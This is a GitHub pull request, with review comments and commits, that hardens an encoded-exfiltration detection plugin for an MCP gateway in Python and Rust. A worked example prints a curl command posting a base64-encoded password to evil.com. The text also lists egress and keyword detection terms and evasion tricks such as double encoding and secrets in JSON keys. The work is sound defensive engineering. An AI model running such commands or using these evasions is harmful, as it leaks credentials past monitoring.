feat(encoded-exfil): test, harden, and document encoded exfiltration detection plugin by gandhipratik203 · Pull Request #3906 · IBM/mcp-context-forge

gandhipratik203 · 2026-03-29T00:02:32Z

Summary

Hardens the encoded exfiltration detection plugin (plugins/encoded_exfil_detection/) to production quality for WXO integration, following a test-driven development approach. All new features are implemented in both Python and Rust with full parity.

The plugin detects suspicious encoded payloads (base64, base64url, hex, percent-encoding, hex escapes) in prompt arguments, tool outputs, and resource content, then blocks or redacts based on a multi-factor suspicion scoring system. It uses Rust acceleration automatically when the encoded_exfil_detection_rust wheel is installed (4.3x–12.1x speedup), otherwise falling back to a pure Python implementation with identical behavior.

This PR closes 10 gaps identified during a thorough gap analysis against the PII filter and secrets detection sibling plugins. It adds allowlisting, configurable keyword/egress lists, nested multi-layer encoding detection, per-encoding thresholds, JSON-within-strings parsing, a resource_post_fetch hook, container recursion depth limiting, and detection logging — all in both Python and Rust. It also adds 112 TDD tests, a full README rewrite, and a Python-vs-Rust performance comparison script.

Gaps closed

Python plugin

Gap 1 (HIGH) — No allowlisting: legitimate base64 in production (JWTs, image data URIs, git SHAs) would cause constant false positives, leading ops teams to disable the plugin. Fixed by adding allowlist_patterns: list[str] to config — regex patterns validated via Pydantic field_validator, compiled once at config creation via model_post_init, and checked before scoring in _scan_text. The PII filter sibling plugin uses the same pattern (whitelist_patterns).

Gap 2 (HIGH) — No per-encoding thresholds: hex encodings have significantly higher false-positive rates than percent-encoding or escaped hex, but a single min_suspicion_score applied to all encoding types. Fixed by adding per_encoding_score: Dict[str, int] to config. The threshold lookup in _evaluate_candidate now uses cfg.per_encoding_score.get(encoding, cfg.min_suspicion_score), falling back to the global threshold for unconfigured encodings. Operators can set e.g. {"hex": 5, "base64": 2} to apply stricter filtering to hex while keeping base64 sensitive.

Gap 3 (MEDIUM) — No resource_post_fetch hook: the secrets detection sibling plugin scans resources, but encoded exfil only covered prompts and tool outputs. An attacker could exfiltrate via encoded content in a resource response. Fixed by adding async def resource_post_fetch() following the same pattern as tool_post_invoke. Updated plugin-manifest.yaml and plugins/config.yaml to declare the new hook.

Gap 4 (MEDIUM) — Hardcoded keyword/egress lists: _SENSITIVE_KEYWORDS (14 entries) and _EGRESS_HINTS (12 entries) were baked into the code with no way to extend them for deployment-specific secrets (e.g., watsonx_api, ibm_cloud_key). Fixed by adding extra_sensitive_keywords: list[str] and extra_egress_hints: list[str] to config. Extras are pre-encoded/lowercased at config creation via model_post_init and merged with built-in defaults during scoring.

Gap 5 (MEDIUM) — No nested encoding detection: an attacker could double-encode a payload (base64(hex(secret))) and the scanner would only see the outer layer, which decodes to another encoded string with no sensitive keywords. Fixed by adding max_decode_depth: int (default 2, range 1-5). After evaluating a candidate, the scanner decodes it and re-scans the decoded text for additional encoded segments. If a nested finding scores higher than the outer finding, the nested finding replaces it. This catches multi-layer obfuscation while respecting the depth limit.

Gap 6 (MEDIUM) — No JSON-within-strings parsing: a string value containing JSON (e.g., '{"secret": "base64..."}') was scanned as flat text. The scanner could find encoded segments in the raw text, but would not recurse into the JSON structure to find segments at deeper nesting levels. Fixed by adding parse_json_strings: bool (default true). After scanning a string, if it parses as a JSON dict or list, the plugin recurses into the parsed structure. Respects max_recursion_depth to prevent abuse.

Gap 7 (LOW) — No container recursion depth limit: deeply nested dicts/lists could cause unbounded recursion. Fixed by adding max_recursion_depth: int (default 32, range 1-1000) to _scan_container. Recursion returns early when the depth limit is exceeded.

Gap 8 (LOW) — No detection logging: when findings were detected, nothing was logged. The PII filter sibling plugin has log_detections. Fixed by adding log_detections: bool (default true) and a _log_detection() method that emits logger.warning with hook name, count, encoding types, and request ID — never decoded payload content.

Rust implementation

Gap 9 (HIGH) — Rust lacked all new features: allowlisting, configurable keywords/egress, nested detection, per-encoding thresholds, JSON-within-strings parsing, and recursion depth were only in Python. Any deployment using Rust acceleration (the default when the wheel is installed) would silently lack these features. Fixed by porting all features to plugins_rust/encoded_exfil_detection/src/lib.rs:

allowlist_patterns: Vec<Regex> compiled from Python config strings with explicit PyValueError on invalid regex (matching Python validation behavior)
extra_sensitive_keywords: Vec<Vec<u8>> and extra_egress_hints: Vec<String> merged with built-in constants
Nested decoding in scan_text with decode_depth parameter, same best-score-wins logic as Python
per_encoding_score: HashMap<String, u32> with same threshold lookup as Python
JSON-within-strings via serde_json::from_str + json_value_to_py converter for recursive scanning
max_recursion_depth counter in scan_container
3 new Rust unit tests: test_nested_base64_detection, test_allowlist_skips_matching_candidate, test_extra_sensitive_keywords

Gap 10 (HIGH) — No Python-vs-Rust performance comparison script: all four other Rust plugins (rate_limiter, pii_filter, secrets_detection, url_reputation) have compare_performance.py but encoded exfil did not. Fixed by creating plugins_rust/encoded_exfil_detection/compare_performance.py with latency mode (per-call timing, 7 scenarios), throughput mode (async concurrency at 1/4/16/64 tasks), and parity smoke tests before each benchmark.

Gap 11 (MEDIUM) — Per-call config parsing overhead in Rust: the Rust entry point was a bare function (py_scan_container) that re-parsed the Python config object via 15 .getattr() calls on every request — including recompiling allowlist regexes, re-encoding keywords to bytes, and re-lowercasing egress hints. The rate limiter Rust plugin avoids this with a persistent RateLimiterEngine class that parses config once at __new__(). Fixed by creating #[pyclass] ExfilDetectorEngine with __new__() (parses config once) and scan() (reuses pre-parsed config). The Python plugin creates the engine at __init__ and calls self._rust_engine.scan(container) on each hook. The bare py_scan_container() function is kept as a backward-compatible wrapper. Result: clean payload speedup improved from 2.4x to 4.3x, small payload from 3.7x to 4.7x.

Additional hardening

Config pre-compilation at creation — allowlist regexes, encoded keywords, and lowercased hints are compiled/pre-processed once in model_post_init (Python) and __new__() (Rust), not on every scan call. Previous implementation re-compiled on every direct _scan_container call.
Wasteful allocation eliminated — nested detection dict copy ({**nf, "start": ..., "end": ...}) moved inside the conditional, only allocating when the finding will actually be used.
Rust regex validation matches Python — Rust now returns PyValueError for invalid allowlist regex patterns instead of silently dropping them via filter_map(|p| Regex::new(&p).ok()). Both implementations now reject bad patterns at config time.
Unused imports cleaned — ruff-flagged unused imports (PromptPrehookPayload, PluginMode, ResourcePostFetchResult) removed from test files.
Pydantic v2 deprecation fixed — replaced class Config: underscore_attrs_are_private = True with model_config = {"ignored_types": (re.Pattern,)} to silence Pydantic v2 deprecation warning.
Plugin version bumped — 0.1.0 → 0.2.0 in both plugin-manifest.yaml and plugins/config.yaml.
Docstring coverage verified — 100% interrogate coverage on the plugin directory (21/21).

Architecture

The plugin uses optional Rust acceleration with automatic Python fallback:

Python owns plugin lifecycle, hook integration (prompt_pre_fetch, tool_post_invoke, resource_post_fetch), and result construction (PluginViolation, PluginResult)
Rust owns the hot path: regex matching, decoding, scoring, allowlist checking, nested decoding, JSON parsing, and redaction
Both implementations share identical logic and produce identical results (verified by parity tests)

Plugin architecture: hook integration, Rust/Python dispatch, and result handling

┌──────────────────────────────────────────────────────────────────────┐
│                   EncodedExfilDetectorPlugin                         │
│                                                                      │
│  Hooks:  prompt_pre_fetch      tool_post_invoke    resource_post_    │
│          (prompt args)         (tool output)       fetch (resource)  │
└─────────────────────────────┬────────────────────────────────────────┘
                              │
                              │  Python responsibilities:
                              │  - validate config (at init)
                              │  - pre-compile allowlist, keywords, hints (at init)
                              │  - extract container from payload
                              │  - dispatch to Rust or Python scanner
                              │  - construct PluginViolation / PluginResult
                              ▼
┌──────────────────────────────────────────────────────────────────────┐
│                        _scan(container)                              │
│                                                                      │
│    ┌──────────────────────┐       ┌──────────────────────────┐      │
│    │  Rust available?     │──YES──│  py_scan_container()     │      │
│    │  (wheel installed)   │       │  Rust hot path:          │      │
│    └──────────┬───────────┘       │  - pre-compiled regexes  │      │
│               │ NO                │  - zero-copy scanning    │      │
│               ▼                   │  - serde_json parsing    │      │
│    ┌──────────────────────┐       │  - 4.3x–12.1x faster    │      │
│    │  _scan_container()   │       └──────────────────────────┘      │
│    │  Python fallback:    │                                          │
│    │  - identical logic   │       Both paths produce identical       │
│    │  - json.loads()      │       results (verified by parity tests) │
│    └──────────────────────┘                                          │
└─────────────────────────────┬────────────────────────────────────────┘
                              │
                              ▼
┌──────────────────────────────────────────────────────────────────────┐
│                        Result Handling                                │
│                                                                      │
│    count ≥ min_findings_to_block AND block_on_detection?             │
│    ├── YES → PluginViolation(code="ENCODED_EXFIL_DETECTED")         │
│    │                                                                 │
│    redact enabled AND content changed?                               │
│    ├── YES → modified_payload with redacted text + metadata          │
│    │                                                                 │
│    └── otherwise → metadata only (count, findings, implementation)   │
└──────────────────────────────────────────────────────────────────────┘

Detection pipeline: what happens inside scan_text for each string

┌─────────────────────────────────────────────────────────────────┐
│  scan_text(text, cfg, decode_depth)                             │
│                                                                  │
│  For each of 5 encoding patterns (base64, base64url, hex,       │
│  percent_encoding, escaped_hex):                                 │
│                                                                  │
│  ┌────────────────┐   ┌────────────────┐   ┌────────────────┐  │
│  │ 1. REGEX MATCH │──▶│ 2. ALLOWLIST   │──▶│ 3. DECODE      │  │
│  │                │   │    CHECK       │   │                │  │
│  │ Find candidate │   │ Skip if regex  │   │ base64 → bytes │  │
│  │ segments in    │   │ matches any    │   │ hex → bytes    │  │
│  │ the text       │   │ allowlist      │   │ etc.           │  │
│  │                │   │ pattern        │   │ Failed → skip  │  │
│  └────────────────┘   └────────────────┘   └───────┬────────┘  │
│                                                     │           │
│                                                     ▼           │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │ 4. SCORE (max 7 points)                                  │   │
│  │                                                           │   │
│  │  +1  decodable           (always, if decode succeeded)    │   │
│  │  +1  high entropy        (Shannon entropy ≥ 3.3)          │   │
│  │  +1  printable payload   (≥ 70% printable ASCII)          │   │
│  │  +2  sensitive keywords  (password, token, api_key, ...)  │   │
│  │  +1  egress context      (curl, webhook, upload, ...)     │   │
│  │  +1  long segment        (≥ 2× min_encoded_length)        │   │
│  └──────────────────────────────────┬───────────────────────┘   │
│                                     │                           │
│                                     ▼                           │
│  ┌────────────────────┐   ┌────────────────────────────────┐   │
│  │ 5. THRESHOLD CHECK │   │ 6. NESTED DECODE               │   │
│  │                    │   │    (if below threshold)         │   │
│  │ score ≥ per-       │   │                                │   │
│  │ encoding threshold │   │ Decode candidate text,          │   │
│  │ or global          │   │ re-scan for inner encodings.    │   │
│  │ min_suspicion_     │   │ If inner score > outer score,   │   │
│  │ score?             │   │ use inner finding.              │   │
│  │                    │   │ Depth limited by                │   │
│  │ YES → finding      │   │ max_decode_depth.               │   │
│  │ recorded           │   │                                │   │
│  └────────────────────┘   └────────────────────────────────┘   │
│                                                                  │
│  After all patterns scanned:                                     │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │ 7. JSON-WITHIN-STRINGS                                    │   │
│  │                                                           │   │
│  │  Is the string valid JSON (dict or list)?                 │   │
│  │  YES → parse with json.loads / serde_json                 │   │
│  │       → recurse into parsed structure                     │   │
│  │       → merge additional findings                         │   │
│  │  NO  → continue                                           │   │
│  └──────────────────────────────────────────────────────────┘   │
│                                                                  │
│  Return: (redacted_text, findings)                               │
└─────────────────────────────────────────────────────────────────┘

Scoring worked example: base64 credential near egress context

Input text:
┌─────────────────────────────────────────────────────────────────┐
│ curl -d 'cGFzc3dvcmQ9c3VwZXItc2VjcmV0LXRva2Vu' https://evil.com │
└─────────────────────────────────────────────────────────────────┘
              ▲                                          ▲
              │ egress context: "curl"                   │ egress context: "https://"

Step 1 — Regex matches base64 candidate:
              cGFzc3dvcmQ9c3VwZXItc2VjcmV0LXRva2Vu

Step 2 — Allowlist check: no match → continue

Step 3 — Decode base64:
┌─────────────────────────────────────────┐
│ password=super-secret-token             │
└─────────────────────────────────────────┘

Step 4 — Score:
┌───────────────────────────────────────────────────┐
│  +1  decodable           ✓ decoded successfully   │
│  +1  high_entropy        ✓ entropy 3.8 ≥ 3.3     │
│  +1  printable_payload   ✓ 100% printable ≥ 70%  │
│  +2  sensitive_keywords  ✓ "password" found       │
│  +1  egress_context      ✓ "curl", "https://"     │
│  +1  long_segment        ✓ 52 chars ≥ 48          │
│  ─────────────────────────────────────────────    │
│   7  TOTAL                                        │
└───────────────────────────────────────────────────┘

Step 5 — Threshold check: 7 ≥ 3 (default) → FINDING RECORDED

Result:
┌─────────────────────────────────────────────────────┐
│  PluginViolation                                     │
│    code: "ENCODED_EXFIL_DETECTED"                    │
│    details:                                          │
│      count: 1                                        │
│      examples: [{encoding: "base64", score: 7, ...}] │
│      implementation: "Rust"                          │
└─────────────────────────────────────────────────────┘

Test results

Test results summary

Scope	Result
Encoded exfil plugin (full, Rust path)	112 passed, 2 xfailed
Integration tests	4 passed
Rust `cargo test`	7 passed
Interrogate docstring coverage	100% (21/21)
Ruff lint	Clean
Bandit security scan	No issues

1. Unit test breakdown

Full test group results (12 groups, 112 tests)

Group	Tests	Status	What it validates
A — Config validation	6	passed	Pydantic rejects invalid values (`min_entropy < 0`, `ratio > 1.0`, etc.)
B — Allowlisting	4	passed	Allowlisted patterns skipped, non-allowlisted flagged, invalid regex rejected
C — Configurable keywords	3	passed	Extra keywords/hints trigger detection, defaults still work
D — `resource_post_fetch` hook	3	passed	Resource blocking, clean passthrough, redaction
E — Functionality gaps	6	passed	`block_on_detection=false` metadata, `None` args, `min_findings_to_block`
F — Bypass resistance	6	passed	Mixed-case hex, boundary lengths, padding, split payloads, long segment
G — Edge cases	5	passed	`max_scan_string_length` boundary, all encodings disabled, non-container types
H — Error handling	3	passed	Invalid config raises, `None` input safe, logs don't leak secrets
I — Rust/Python parity	3	passed	Identical counts, scores, encodings, redacted output between paths
J — Integration	4	passed	Plugin loads, end-to-end block, coexistence, clean passthrough
K — Nested encoding	3	passed	Double-encoded base64, depth limiting, hex-wrapped base64
L — Documented limitations	5	3 passed, 2 xfailed	Per-encoding thresholds ✓, JSON-in-strings ✓, malformed JSON ✓; cross-request ✗, custom patterns ✗

2. Rust unit tests

Full Rust test results (7 tests)

test tests::test_scan_text_detects_base64_sensitive_payload ... ok
test tests::test_scan_text_redacts_when_enabled ... ok
test tests::test_scan_text_ignores_short_candidates ... ok
test tests::test_scan_text_detects_adjacent_matches ... ok
test tests::test_nested_base64_detection ... ok
test tests::test_allowlist_skips_matching_candidate ... ok
test tests::test_extra_sensitive_keywords ... ok

test result: ok. 7 passed; 0 failed; 0 ignored

3. Python vs Rust performance comparison

Full benchmark results (Apple Silicon, release build, 200 iterations)

Parity smoke tests pass for all 7 scenarios before benchmarking.

Scenario	Python	Rust	Speedup
1 base64 finding (prompt hook)	0.035ms	0.007ms	4.7x
1 base64 finding (tool hook)	0.033ms	0.008ms	4.3x
5 mixed findings (prompt hook)	0.106ms	0.018ms	5.7x
20+ mixed findings (tool hook)	0.662ms	0.086ms	7.7x
Clean payload (prompt hook)	0.014ms	0.003ms	4.3x
Clean payload (tool hook)	0.012ms	0.003ms	4.0x
~50KB text, 2 findings (tool hook)	1.432ms	0.118ms	12.1x

Rust speedup scales with payload size: 4.3x on clean payloads (improved from 2.4x after the persistent engine refactor eliminated per-call config parsing), up to 12.1x on large text where pre-compiled static regexes, fixed-size entropy arrays, and zero-copy string processing provide the largest advantage.

Limitations

Cross-request correlation is not tracked
The plugin is stateless. An attacker splitting a credential across multiple requests (slow exfil) will not be detected. This is a separate system concern — it requires stateful storage across requests (Redis, decay windows, reassembly logic) that is fundamentally different from a plugin's scan-per-request model. Documented as an xfail test.

Custom encoding patterns are not supported
Only the 5 built-in encoding types (base64, base64url, hex, percent-encoding, escaped hex) are available. User-defined regex patterns are not accepted because user-supplied regexes can cause ReDoS (catastrophic backtracking). The 5 built-in types cover the vast majority of real-world encoding-based exfiltration attempts. Documented as an xfail test.

JSON-within-strings adds overhead
Every string value gets a json.loads() / serde_json::from_str() attempt. On clean payloads (majority of traffic), this is a failed parse on every string (~1-3 microseconds). The parse_json_strings: false flag allows operators to disable this if the overhead is unacceptable.

Nested detection adds scan overhead
With max_decode_depth=2 (default), every candidate that decodes successfully but scores below threshold triggers a re-scan of the decoded text. For payloads with many decodable-but-innocent segments, this increases scan time. Setting max_decode_depth=1 disables nested detection.

Allowlist patterns match the encoded form, not decoded content
The allowlist regex is tested against each raw encoded candidate string before decoding. This means patterns must match the encoded form (e.g., the base64 prefix of a JWT), not the decoded content. This is intentional — matching decoded content would require decoding first, defeating the purpose of skipping known-good patterns early.

Not validated on OpenShift
All testing was performed locally and in CI. The plugin has not been tested on an OpenShift cluster, which is the target production environment.

Closes #3807.

crivetimihai · 2026-03-29T13:14:58Z

Thanks @gandhipratik203. Will review the detection improvements and Rust parity implementation.

gandhipratik203

Hi @lucarlig , thanks for the detailed review — really appreciate you testing with a concrete payload and catching the double-counting issue.

Addressed in this push:

Double-counting — Great catch. When a string is valid JSON, we now scan only the parsed structure and skip the raw text scan entirely, so a single secret produces exactly one finding. Added a regression test for this.
JSON bypasses oversized-input guard — Good point. Added a size check (len <= max_scan_string_length) and a quick heuristic (string must start with { or [) before attempting JSON parse. Applied to both Python and Rust.
Rust path test coverage — Fair feedback. Added 8 new parametrized tests covering per-encoding thresholds, JSON parsing, heuristic skip, and malformed JSON on both Python and Rust paths.
README inconsistencies — Fixed. Corrected the wheel name to mcpgateway-encoded-exfil-detection, removed JSON-within-strings and per-encoding thresholds from Known Limitations (since they're now implemented), and added a Performance section with benchmark results.

Noted for follow-up:

Double decode in nested scan — Agree this is an optimization opportunity. In practice the cost is microseconds per candidate (Rust path: ~0.007ms per finding) so it doesn't show up in benchmarks today. Happy to optimize if profiling surfaces it as a bottleneck.
JSON FFI allocation churn — The serde_json → Python object conversion is inherent to the recursive approach. It's now bounded by both max_recursion_depth and the new max_scan_string_length guard on JSON parsing. Happy to revisit if large embedded JSON becomes a concern in production.

lucarlig

JSON-string parsing introduces a real Rust-path bypass for secrets embedded in JSON object keys. Once the string is parsed, the Rust scanner only traverses values and never scans keys, so a payload like {"<base64-secret>":"x"} is missed.
the Rust JSON-string path can change a clean string payload into a structured object even with no findings. scan_container() parses the string, converts the JSON tree back into Python objects with json_value_to_py(), and returns that structure instead of the original string. In hook flows, that can surface as a payload mutation purely because JSON parsing happened.

gandhipratik203 · 2026-03-30T12:13:55Z

Hi Dima, thanks for the thorough review and the positive feedback on the test coverage and documentation.

Already addressed (before your review):

JSON parsing heuristic (Update Makefile and pyproject.toml with packaging steps #3) — Added a quick check: only attempt json.loads if the string starts with { or [ and is within max_scan_string_length. Both Python and Rust.
Allowlist validation index (Add testing documentation #4) — Error message now includes at index {idx} for easier debugging.
Performance section in README (Add postgresql to container build #5) — Added with the full benchmark table.

Addressed now:

Allowlist edge cases (missing test) — Added a partial match test confirming that a substring-matching allowlist pattern correctly suppresses the candidate.
Rust = boundary validation (Open Source release of MCP Context Forge - MCP Gateway #2) — The current behavior is correct: = is excluded from boundary checks because it's a common separator before base64 (data=cGFzc3dvcmQ9...) and the regex already captures trailing = padding as part of the match. Cleaned up the implementation to compute the boundary chars once instead of twice per call.

Deferring:

Nested decoding recursion budget (Configure Renovate #1) — With max_decode_depth=2 (default) and max_findings_per_value=50, the worst case is already bounded. Happy to add a global scan counter if profiling shows it's needed.
Concurrent scanning test — The plugin is stateless per call with no shared mutable state, so thread safety is guaranteed by design.
Large payload performance test — Already covered by test_max_scan_string_length_exact_boundary_not_skipped in the edge cases group.

gandhipratik203 · 2026-03-30T13:11:25Z

Hi @lucarlig, thanks for the follow-up — good catches both.

Fixed:

JSON keys not scanned — Dict keys are now scanned as strings when len(key) >= min_encoded_length. A payload like {"<base64-secret>": "x"} is now detected. Applied to both Python and Rust dict traversal, with findings tagged with a (key) path suffix. Added test.
JSON type mutation — Changed the approach: we now scan the raw text first (preserving the original string type), then parse JSON for additional findings only. Duplicates are filtered by match preview. The return value is always the original string — no more type conversion from str to dict. Added test verifying return type preservation.

dima-zakharov

Commit Review: `afab86f`

Commit: afab86f24bd580045f3596860cbbb03c28bc20bb
Author: Pratik Gandhi
Date: March 30, 2026
Title: fix(encoded-exfil): scan dict keys for encoded secrets, prevent JSON type mutation

Summary

This commit addresses two important issues in the encoded exfiltration detection plugin:

Dict Key Scanning: Adds detection of encoded secrets used as JSON object keys
JSON Type Mutation Prevention: Fixes a bug where JSON-within-strings scanning could mutate the return type from string to dict/list

Files Changed: 4
Lines Changed: +91, -30

Verdict: ✅ Approve

Well-structured fix with comprehensive tests. Addresses real security gaps and type safety issues.

Changes Reviewed

1. Python Implementation (`encoded_exfil_detector.py`)

Change A: JSON Type Mutation Prevention (Lines 420-447)

Before:

if isinstance(container, str):
    # Try parsing string as JSON first — scan parsed structure only
    if cfg.parse_json_strings and ...:
        parsed = json.loads(container)
        if isinstance(parsed, (dict, list)):
            return _scan_container(parsed, cfg, path=json_path, ...)  # ❌ Returns dict/list
    redacted, findings = _scan_text(container, cfg, path=path)
    return len(findings), redacted, findings

After:

if isinstance(container, str):
    # Scan as raw text first — always returns the original type (string)
    redacted, findings = _scan_text(container, cfg, path=path)
    
    # Try parsing string as JSON for additional findings (metadata only, no type mutation)
    if cfg.parse_json_strings and ...:
        try:
            parsed = json.loads(container)
            if isinstance(parsed, (dict, list)):
                _, _, json_findings = _scan_container(parsed, cfg, path=json_path, ...)
                # Deduplicate: only add JSON findings whose encoded match isn't already found
                raw_matches = {f.get("match") for f in findings}
                for jf in json_findings:
                    if jf.get("match") not in raw_matches:
                        findings.append(jf)
        except (json.JSONDecodeError, ValueError):
            pass
    return len(findings), redacted, findings  # ✅ Always returns string

Assessment: ✅ Correct

Type Safety: String input now always returns string output (critical for plugin contract)
Additive Scanning: JSON parsing is now findings-only, not transformative
Deduplication: Match preview comparison prevents double-counting
Performance: JSON heuristic check (startswith('{') or startswith('[')) already exists from previous commit

Change B: Dict Key Scanning (Lines 451-457)

Added:

for key, value in container.items():
    child_path = f"{path}.{key}" if path else str(key)
    
    # Scan keys that are long enough to contain encoded content
    if isinstance(key, str) and len(key) >= cfg.min_encoded_length:
        key_path = f"{child_path}(key)"
        _, key_findings = _scan_text(key, cfg, path=key_path)
        findings.extend(key_findings)
        total += len(key_findings)
        
    count, new_value, child_findings = _scan_container(value, cfg, path=child_path, ...)

Assessment: ✅ Correct

Security: Detects encoded secrets used as JSON keys (e.g., {"cGFzc3dvcmQ9c2VjcmV0": "value"})
Performance: Only scans keys meeting min_encoded_length threshold
Path Annotation: (key) suffix clearly identifies key-based findings
Symmetry: Matches value scanning logic

Security Impact: 🔴 High - Closes evasion vector where attackers hide encoded secrets in JSON keys

2. Rust Implementation (`lib.rs`)

Change: Mirrors Python Logic

The Rust implementation correctly mirrors the Python changes:

// Scan as raw text first
let (redacted_text, findings) = scan_text(&text, path, cfg, 0);
let findings_list = PyList::empty(py);
for finding in &findings {
    findings_list.append(finding_to_dict(py, finding)?)?;
}

// Try parsing string as JSON for additional findings
if cfg.parse_json_strings && ... {
    let (_, _, json_findings) = scan_container(py, &py_parsed, &json_path, cfg, depth + 1)?;
    
    // Deduplicate using HashSet for O(1) lookup
    let raw_matches: std::collections::HashSet<String> =
        findings.iter().map(|f| f.matched_preview.clone()).collect();
    for item in json_findings.iter() {
        if let Ok(dict) = item.cast::<PyDict>() {
            let preview = dict.get_item("match")...;
            if !raw_matches.contains(&preview) {
                findings_list.append(item)?;
            }
        }
    }
}

// Dict key scanning
for (key, value) in dict.iter() {
    let key_str = key.str()?.to_string_lossy().into_owned();
    
    // Scan keys that are long enough to contain encoded content
    if key_str.len() >= cfg.min_encoded_length {
        let key_path = format!("{}(key)", child_path);
        let (_, key_findings) = scan_text(&key_str, &key_path, cfg, 0);
        // ... add findings ...
    }
}

Assessment: ✅ Correct

Uses HashSet<String> for efficient O(1) deduplication lookup
Properly handles PyO3 type conversions
Returns PyString to preserve original type
Dict key scanning logic matches Python implementation

3. Test Coverage (`test_encoded_exfil_detector.py`)

New Test 1: Type Preservation

def test_json_string_returns_string_not_dict(self, use_rust: bool):
    """JSON-parsed strings must return the original string type, not a parsed dict."""
    json_str = json.dumps({"key": "clean value"})
    cfg = EncodedExfilDetectorConfig(parse_json_strings=True)
    payload = {"data": json_str}

    _, result, _ = _scan_container(payload, cfg, use_rust=use_rust)
    # The "data" value must still be a string, not a parsed dict
    assert isinstance(result["data"], str), f"Expected str but got {type(result['data'])}"

Assessment: ✅ Correct - Validates type preservation contract

New Test 2: Dict Key Detection

def test_encoded_secret_in_dict_key_detected(self, use_rust: bool):
    """Encoded secrets used as dict keys should be detected."""
    encoded_key = base64.b64encode(b"password=super-secret-credential-value").decode()
    cfg = EncodedExfilDetectorConfig(min_suspicion_score=1)
    payload = {encoded_key: "some value"}

    count, _, findings = _scan_container(payload, cfg, use_rust=use_rust)
    assert count >= 1, "Encoded secret in dict key should be detected"
    assert any("key" in f.get("path", "") for f in findings), "Finding path should contain 'key'"

Assessment: ✅ Correct - Validates key scanning functionality

Updated Test: JSON Heuristic

def test_json_within_string_detection(self, use_rust: bool):
    """JSON embedded in string should be scanned with precise paths."""
    json_str = json.dumps({"password": "secret-value"})
    cfg = EncodedExfilDetectorConfig(min_suspicion_score=1, parse_json_strings=True)
    payload = {"data": json_str}

    count, result, findings = _scan_container(payload, cfg, use_rust=use_rust)
    assert count == 1
    # Return type must be string (no type mutation)
    assert isinstance(result["data"], str), f"Expected str but got {type(result['data'])}"

Assessment: ✅ Correct - Updated assertion validates type preservation

Findings

✅ Strengths

Type Safety: Fixes critical type mutation bug that could break downstream plugins
Security: Closes evasion vector via encoded JSON keys
Deduplication: Smart match-preview comparison prevents double-counting
Test Coverage: Both changes have dedicated tests with Python/Rust parity
Performance: Key scanning gated by min_encoded_length threshold
Symmetry: Python and Rust implementations are consistent

✅ No Issues Found

Logic is sound
Edge cases handled (non-string keys, JSON parse failures)
Type annotations correct
Test coverage comprehensive

Security Impact Assessment

Before This Commit

Attack Vector	Detected?
Encoded secret in JSON value	✅ Yes
Encoded secret in JSON key	❌ No (evasion possible)
JSON string mutated to dict	⚠️ Bug (type safety issue)

After This Commit

Attack Vector	Detected?
Encoded secret in JSON value	✅ Yes
Encoded secret in JSON key	✅ Yes (fixed)
JSON string mutated to dict	✅ Fixed (type preserved)

Recommended Actions

None Required

This commit is ready to merge as-is. The changes are:

✅ Well-tested (Python + Rust parity)
✅ Security-enhancing (closes evasion vector)
✅ Bug-fixing (type mutation prevention)
✅ Performance-safe (threshold-gated scanning)

Conclusion

✅ Approve

This is a high-quality fix that addresses both a security gap (encoded keys) and a type safety bug (JSON mutation). The implementation is clean, well-tested, and maintains Python/Rust parity.

Key Improvements:

Encoded secrets in JSON keys are now detected
String inputs always return string outputs (type contract preserved)
Deduplication prevents double-counting across raw/JSON scans

Review generated by automated code review process.

…with full Rust parity - Add allowlist_patterns config with regex validation to suppress false positives - Add extra_sensitive_keywords and extra_egress_hints for configurable detection tuning - Add nested encoding detection with max_decode_depth (peels base64-of-hex etc.) - Add per_encoding_score for per-encoding suspicion thresholds - Add parse_json_strings to detect encoded payloads inside JSON string values - Add resource_post_fetch hook to scan fetched resources for exfiltration - Add container recursion depth limiting (max_recursion_depth) - Add detection logging (log_detections flag, no sensitive content in logs) - Port all features to Rust with full parity via persistent ExfilDetectorEngine class - Add compare_performance.py: Python vs Rust benchmarks (4.3x-12.1x speedup) - Add 112 TDD tests: config validation, bypass resistance, parity, integration, nested encoding, JSON parsing, and xfail-documented limitations - Full README rewrite with config reference, tuning guide, and worked examples Closes #3807 Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

- Replace object.__setattr__() with setattr() to fix ruff PLC2801 - Rename unused __context to _context to fix vulture - Run cargo fmt on Rust test code Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

- Collapse nested if statements in Rust to satisfy clippy collapsible_if - Add pylint disable for model_post_init arguments-differ Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

…is enabled When a string is valid JSON, scan only the parsed structure — do not also scan the raw text. This prevents the same encoded value from being counted twice (once in the raw string, once in the parsed JSON value), which could incorrectly trip min_findings_to_block. Add regression test verifying a single secret in a JSON string produces exactly 1 finding, not 2. Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

…s, README fixes - Add JSON parse heuristic: only attempt json.loads if string starts with { or [ and is within max_scan_string_length (Python + Rust) - Add Rust-path test coverage for per-encoding thresholds, JSON parsing, heuristic skip, and malformed JSON (8 new parametrized tests) - Fix README: correct wheel name to mcpgateway-encoded-exfil-detection, remove implemented features from Known Limitations, add Performance section - Include pattern index in allowlist validation error messages - Regenerate secrets baseline Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

…ist partial match test - Hoist core_chars.replace('=', "") to a single let above both boundary checks in has_valid_boundaries() to avoid redundant string allocation - Add test verifying allowlist partial match suppresses detection Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

…type mutation - Scan dict keys as strings when len >= min_encoded_length to detect secrets used as JSON object keys (both Python and Rust) - Prevent JSON-within-strings from mutating return type: scan raw text first (preserves original string), then parse JSON for additional findings with deduplication by match preview - Add tests for key scanning and type preservation - Update JSON test assertions to verify string return type Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>

…ve matching - Fix parity bug: extra_sensitive_keywords and extra_egress_hints were not lowercased in Python, causing case-insensitive matching to fail when users configured mixed-case keywords. Rust already lowercases both (kw.to_lowercase() / h.to_lowercase()). - Update module docstring to list all 3 hooks (was missing resource_post_fetch). - Add pragma: no cover to Rust-only code paths (import, scan, engine init). - Add regression tests for mixed-case extra keywords and egress hints. - Add test for max_recursion_depth container depth guard. - Add test for JSON dedup path (Unicode-escaped base64 only found via JSON parse). - Achieve 100% differential test coverage on Python plugin. - Update .secrets.baseline for new test file entries (false positives). Signed-off-by: Mihai Criveti <crivetimihai@gmail.com>

